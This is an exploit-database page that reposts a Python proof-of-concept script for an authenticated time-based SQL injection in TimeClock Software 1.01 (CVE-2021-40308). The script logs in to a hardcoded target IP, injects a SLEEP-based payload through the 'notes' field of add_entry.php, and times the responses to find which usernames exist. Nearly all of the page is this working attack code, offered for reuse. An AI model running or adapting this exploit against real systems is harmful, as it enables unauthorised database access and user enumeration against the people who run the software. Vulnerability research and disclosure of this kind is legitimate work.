TimeClock Software 1.01 0 (Authenticated) Time-Based SQL Injection
CVE
Category
Price
Severity
CVE-2021-40308
CWE-89
$500
High
Author
Risk
Exploitation Type
Date
r@bittick
High
Remote
2020-10-14
CVSS vector description
Metric
Value
Metric Description
Value Description
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020100082 Below is a copy:
TimeClock Software 1.01 0 (Authenticated) Time-Based SQL Injection #!/usr/bin/python3
# Exploit Title: TimeClock Software 1.01 Authenticated Time-Based SQL Injection
# Date: July 21, 2020
# Exploit Author: François Bibeau
# Co Author: Tyler Butler, http://tbutler.org, https://twitter.com/tbutler0x90
# Vendor Homepage: http://timeclock-software.net/
# Software Link: http://timeclock-software.net/timeclock-download.php
# Version: 1.01
# Tested on: Ubuntu 18.04.3 (LTS) x64, mysql 5.7, php 7.2.1-apache
import time
import requests
login_url = 'http://159.203.41.34/login_action.php' # Ensure to change ip to match target
login_data = {'username':'fred','password':'fred','submit':'Log In'}
headers = {'User-Agent': 'Mozilla/5.0'}
# init session & login
session = requests.Session()
session.post(login_url,headers=headers,data=login_data)
# static list provided for PoC, could use a text file
users = ['john','bill','tim','fred','garry','sid','admin']
for user in users:
url = "http://159.203.41.34/add_entry.php"
payload = f"' OR IF((SELECT username FROM user_info WHERE username='{user}')='{user}', SLEEP(5), NULL)='"
data = {'data_month': '1',
'data_day': '1',
'data_year': '1',
'type_id': '5',
'hours': '1',
'notes': payload,
'submit': 'Add'}
print(f'Checking user {user}... ', end = '')
start = time.time()
response = session.post(url,data=data)
end = time.time()
delay = end - start
if delay > 5:
print('User found!')
else:
print('')
Copyright ©2024 Exploitalert.
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum